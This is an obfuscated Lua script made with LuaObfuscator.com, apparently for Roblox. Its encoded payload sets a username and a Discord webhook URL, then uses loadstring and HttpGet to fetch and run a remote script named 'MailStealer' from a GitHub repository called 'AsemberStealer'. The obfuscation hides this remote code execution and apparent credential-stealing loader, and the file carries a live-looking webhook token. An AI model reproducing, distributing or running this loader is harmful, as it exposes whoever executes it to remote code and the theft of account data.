--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v83,v19);v19=nil;v89=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-1)))%(((1275 -(226 + 1044)) -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -1))) ;return v84-(v84%1) ;else local v85=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v85 + v85))>=v85) and ((2477 -1908) -(367 + 201))) or ((1182 -(32 + 85)) -(68 + 997)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v37=1 -0 ;end if (v37==((1303 -(802 + 150)) -(87 + 263))) then return (v41 * (16777396 -(67 + 113))) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end end end local function v24()local v42=438 -(145 + 293) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -3)) then v47=v20(v44,37 -16 ,10 + 21 );v48=((v20(v44,24 + 8 )==(998 -(915 + 82))) and  -(2 -1)) or (4 -3) ;v42=2 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1188 -(1069 + 118) ;end if (v42==3) then if (v47==(0 -(0 + 0))) then if (v46==(0 -0)) then return v48 * (0 -(0 -0)) ;else v47=1 -0 ;v45=0 + 0 + 0 ;end elseif (v47==(724 + 1323)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/((848 + 232) -((2075 -(87 + 968)) + 60))))) or (v48 * NaN) ;end return v8(v48,v47-(1814 -((1619 -1251) + 423)) ) * (v45 + (v46/((6 -4)^(163 -111)))) ;end if ((4 -3)==v42) then v45=19 -(10 + 8 + 0) ;v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * ((6 -4)^(14 + 18))) + v43 ;v42=3 -1 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1414 -(447 + 966) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1 + 2)) then v59=nil;v60=nil;v52=4;end if (v52==(1640 -(1373 + 263))) then while true do if (v53~=(1000 -(451 + 549))) then else local v95=0 + 0 ;while true do if (v95~=(1 -0)) then else v53=1 -0 ;break;end if (v95~=0) then else v54=1384 -(746 + 638) ;v55=nil;v95=1;end end end if ((2 + 1)~=v53) then else v60=nil;while true do local v97=0;local v98;while true do if (v97==(0 -0)) then v98=341 -(218 + 123) ;while true do if (v98~=0) then else local v139=0;while true do if (v139==(1581 -(1535 + 46))) then if (0==v54) then local v157=0;local v158;while true do if (v157~=(0 + 0)) then else v158=0;while true do if (v158==(0 + 0)) then local v174=560 -(306 + 254) ;while true do if (v174==(1 + 0)) then v158=1 -0 ;break;end if (v174==(1467 -(899 + 568))) then v55={};v56={};v174=1 + 0 ;end end end if (v158==1) then v57={};v54=2 -1 ;break;end end break;end end end if ((604 -(268 + 335))~=v54) then else local v159=0;while true do if (v159~=1) then else v60={};v54=2;break;end if (v159==0) then v58={v55,v56,nil,v57};v59=v23();v159=1;end end end v139=1;end if (v139==(1457 -(282 + 1174))) then v98=812 -(569 + 242) ;break;end end end if (v98~=1) then else if (v54~=(8 -5)) then else local v155=0 + 0 ;while true do if (v155==(1024 -(706 + 318))) then for v161=1252 -(721 + 530) ,v23() do v56[v161-(1272 -(945 + 326)) ]=v28();end return v58;end end end if (v54==2) then local v156=0;while true do if (v156==1) then for v163=1,v23() do local v164=0;local v165;local v166;local v167;while true do if ((2 -1)==v164) then v167=nil;while true do if (v165==0) then local v175=0;while true do if (v175==0) then v166=0;v167=nil;v175=1 + 0 ;end if (1~=v175) then else v165=701 -(271 + 429) ;break;end end end if ((1 + 0)==v165) then while true do if (v166==0) then v167=v21();if (v20(v167,1501 -(1408 + 92) ,1)==0) then local v178=1086 -(461 + 625) ;local v179;local v180;local v181;local v182;local v183;while true do if (v178~=2) then else v183=nil;while true do if (0==v179) then v180=1288 -(993 + 295) ;v181=nil;v179=1 + 0 ;end if (v179==(1172 -(418 + 753))) then v182=nil;v183=nil;v179=1 + 1 ;end if (v179~=(1 + 1)) then else while true do if (v180==(1 + 1)) then if (v20(v182,1,1 + 0 )~=1) then else v183[2]=v60[v183[531 -(406 + 123) ]];end if (v20(v182,1771 -(1749 + 20) ,2)==(1 + 0)) then v183[1325 -(1249 + 73) ]=v60[v183[2 + 1 ]];end v180=1148 -(466 + 679) ;end if (v180~=1) then else v183={v22(),v22(),nil,nil};if (v181==(1900 -(106 + 1794))) then local v190=0 + 0 ;while true do if (v190~=0) then else v183[3]=v22();v183[4]=v22();break;end end elseif (v181==(1 + 0)) then v183[3]=v23();elseif (v181==2) then v183[3]=v23() -((5 -3)^16) ;elseif (v181==(7 -4)) then local v198=114 -(4 + 110) ;local v199;while true do if (v198==0) then v199=0;while true do if (v199~=0) then else v183[587 -(57 + 527) ]=v23() -((1429 -(41 + 1386))^16) ;v183[107 -(17 + 86) ]=v22();break;end end break;end end end v180=2;end if (v180~=3) then else if (v20(v182,3 + 0 ,3)~=(1 -0)) then else v183[11 -7 ]=v60[v183[170 -(122 + 44) ]];end v55[v163]=v183;break;end if (v180~=0) then else local v185=0 -0 ;while true do if (v185==(0 -0)) then local v193=0 + 0 ;while true do if (v193==(1 + 0)) then v185=1 -0 ;break;end if (v193~=0) then else v181=v20(v167,67 -(30 + 35) ,3);v182=v20(v167,3 + 1 ,6);v193=1258 -(1043 + 214) ;end end end if (v185==(3 -2)) then v180=1;break;end end end end break;end end break;end if (v178==1) then v181=nil;v182=nil;v178=2;end if (0==v178) then v179=1212 -(323 + 889) ;v180=nil;v178=2 -1 ;end end end break;end end break;end end break;end if (v164==0) then v165=0;v166=nil;v164=1;end end end v54=3;break;end if (v156==0) then for v168=581 -(361 + 219) ,v59 do local v169=0;local v170;local v171;local v172;local v173;while true do if (v169==(322 -(53 + 267))) then while true do if (v170~=0) then else v171=0;v172=nil;v170=1;end if (v170~=(1 + 0)) then else v173=nil;while true do if (v171~=0) then else local v176=413 -(15 + 398) ;while true do if (v176==(982 -(18 + 964))) then v172=v21();v173=nil;v176=1;end if (v176==(3 -2)) then v171=1;break;end end end if (v171~=(1 + 0)) then else if (v172==(1 + 0)) then v173=v21()~=(850 -(20 + 830)) ;elseif (v172==2) then v173=v24();elseif (v172==(3 + 0)) then v173=v25();end v60[v168]=v173;break;end end break;end end break;end if (v169==(127 -(116 + 10))) then v172=nil;v173=nil;v169=1 + 1 ;end if (v169==(738 -(542 + 196))) then v170=0;v171=nil;v169=1;end end end v58[6 -3 ]=v21();v156=1;end end end break;end end break;end end end break;end if (v53==(1 + 1)) then v58=nil;v59=nil;v53=2 + 1 ;end if (v53==1) then local v96=0;while true do if (v96==0) then v56=nil;v57=nil;v96=1 + 0 ;end if (v96==1) then v53=4 -2 ;break;end end end end break;end if (v52==1) then v55=nil;v56=nil;v52=4 -2 ;end if (v52==0) then v53=1551 -(1126 + 425) ;v54=nil;v52=406 -(118 + 287) ;end if (v52==2) then v57=nil;v58=nil;v52=3;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82==1) then local v103=0;while true do if (v103==1) then v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v103=2;end if (3==v103) then v73=v81[3];break;end if (v103==0) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v103=1;end if (v103==2) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v103=3;end end else v73=v81[3];end elseif (v82<=3) then v63[v81[3]]=v79[v81[2]];elseif (v82==4) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]();end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v81[3];elseif (v82==7) then local v105=v81[2];local v106,v107=v72(v79[v105](v13(v79,v105 + 1 ,v81[3])));v74=(v107 + v105) -1 ;local v108=0;for v133=v105,v74 do local v134=0;while true do if (v134==0) then v108=v108 + 1 ;v79[v133]=v106[v108];break;end end end else local v109=0;local v110;while true do if (0==v109) then v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));break;end end end elseif (v82<=10) then if (v82>9) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82==11) then local v114;local v115,v116;local v117;local v118;v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v118=v81[2];v117=v79[v81[3]];v79[v118 + 1 ]=v117;v79[v118]=v117[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v118=v81[2];v115,v116=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v74=(v116 + v118) -1 ;v114=0;for v135=v118,v74 do v114=v114 + 1 ;v79[v135]=v115[v114];end v73=v73 + 1 ;v81=v69[v73];v118=v81[2];v79[v118]=v79[v118](v13(v79,v118 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else local v128=v81[2];local v129=v79[v81[3]];v79[v128 + 1 ]=v129;v79[v128]=v129[v81[4]];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203073O006361696F636A6D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6173656D6265723132332F4173656D626572537465616C65722F6D61696E2F4D61696C537465616C657203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313531323731343931343835332O313039372F4D31786E6C785F52433574423853452D6A686D46572O5A4F722O32505A3470326473766B4E454B344B55694872515737466769485A323659656A6D744866625634686D6300173O0012063O00013O0026043O000E000100020004023O000E0001001206000100043O00120B000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026043O0001000100010004023O00010001001206000100043O001201000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
